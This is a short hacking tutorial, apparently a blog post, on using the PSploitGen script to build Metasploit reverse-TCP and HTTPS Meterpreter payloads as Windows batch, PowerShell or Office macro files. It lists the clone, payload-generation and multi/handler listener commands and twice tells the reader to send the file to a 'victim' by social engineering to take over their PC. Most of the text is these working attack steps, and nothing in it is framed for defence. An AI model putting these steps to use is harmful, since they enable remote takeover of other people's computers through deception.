This python script generates metasploit shellcode payloads in Windows batch file format, powershell script format, and MS-Office visual basic macro format. The default metasploit payloads are:
- windows/meterpreter/reverse_tcp
- windows/x64/meterpreter/reverse_tcp
If TCP port 443 is specified, the script will automatically generate an HTTPS payload also using ‘windows/meterpreter/reverse_https’. The script will accept multiple TCP ports which are comma delimitered.
Open your kali Linux terminal and type the following command
git clone https://bitbucket.org/jsthyer/psploitgen.git
Now type following command to create payload
./psploitgen.py –lhost 192.168.0.140 –lport 4444 –payload windows/x64/meterpreter/reverse_tcp
Now it will show a file with extension .bat and send your bat files to victim using any social engineering technique
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.140
exploit
Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.
The post Exploit Remote Windows PC using PSploitGen appeared first on Hacking Articles.